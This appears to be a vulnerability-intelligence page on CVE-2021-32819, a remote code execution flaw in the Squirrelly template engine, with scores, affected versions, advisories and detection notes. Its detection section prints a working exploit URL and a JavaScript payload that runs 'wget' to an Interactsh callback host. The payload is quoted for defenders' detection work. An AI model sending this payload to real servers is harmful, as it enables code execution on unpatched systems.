CVE-2021-32819
published 2021-05-14CVE-2021-32819: Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine…
PriorityP187high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
59.84%
99.0th percentile
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| squirrelly | squirrelly | — | — |
| squirrelly | squirrelly | >= 0 < 9.0.0 | 9.0.0 |
| squirrellyjs | squirrelly | >= 9.0.0 < 9.0.0 | 9.0.0 |
Detection & IOCsextracted from sources · hover to see the quote
url/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
commandvar require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http://{{interactsh-url}}');
- →Exploit arrives as a GET request with query parameters 'Express', 'autoEscape', and 'defaultFilter'; the 'defaultFilter' parameter carries a JavaScript injection payload that breaks out of the template context and invokes child_process.exec via global.process.mainModule.constructor._load.
- →Successful exploitation can be confirmed via an out-of-band HTTP callback (OAST); look for an inbound HTTP request carrying 'User-Agent: Wget' originating from the target server.
- →The attack overwrites internal Squirrelly configuration options (autoEscape, defaultFilter) through the Express render API query string, enabling template sandbox escape and RCE. ↗
- ·The vulnerability affects Squirrelly versions up to and including 8.0.8; version 9.0.0 contains the fix. Detections should be scoped to deployments running affected versions.
- ·Exploitation requires the target application to expose user-controlled data to the Express render API query string (e.g., passing req.query directly as template locals), which is an application-level configuration issue. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Insecure template handling in Squirrelly
ghsa·2021-05-17
CVE-2021-32819 [HIGH] CWE-200 Insecure template handling in Squirrelly
Insecure template handling in Squirrelly
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. Version 9.0.0 has a fix for this issue. For complete details refer to the referenced [GHSL-2021-023](https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/).
OSV
Insecure template handling in Squirrelly
osv·2021-05-17
CVE-2021-32819 [HIGH] Insecure template handling in Squirrelly
Insecure template handling in Squirrelly
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. Version 9.0.0 has a fix for this issue. For complete details refer to the referenced [GHSL-2021-023](https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/).
VulnCheck
squirrelly squirrelly Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2021·CVSS 8.0
CVE-2021-32819 [HIGH] squirrelly squirrelly Exposure of Sensitive Information to an Unauthorized Actor
squirrelly squirrelly Exposure of Sensitive Information to an Unauthorized Actor
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
Affected: squirrelly squirrelly
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-02-07&
No detection rules found.
Nuclei
Nodejs Squirrelly - Remote Code Execution
nuclei·CVSS 8.8
CVE-2021-32819 [HIGH] Nodejs Squirrelly - Remote Code Execution
Nodejs Squirrelly - Remote Code Execution
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
Template:
id: CVE-2021-32819
info:
name: Nodejs Squirrelly - Remote Code Execution
author: pikpikcu
severity: high
description: |
Nodejs Squirrelly is susceptible to remote code execution.
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1ehttps://github.com/squirrellyjs/squirrelly/commit/dca7a1e7ee91d8a6ffffb655f3f15647486db9dahttps://github.com/squirrellyjs/squirrelly/pull/254https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1ehttps://github.com/squirrellyjs/squirrelly/commit/dca7a1e7ee91d8a6ffffb655f3f15647486db9dahttps://github.com/squirrellyjs/squirrelly/pull/254https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
2021-05-14
Published
Exploited in the wild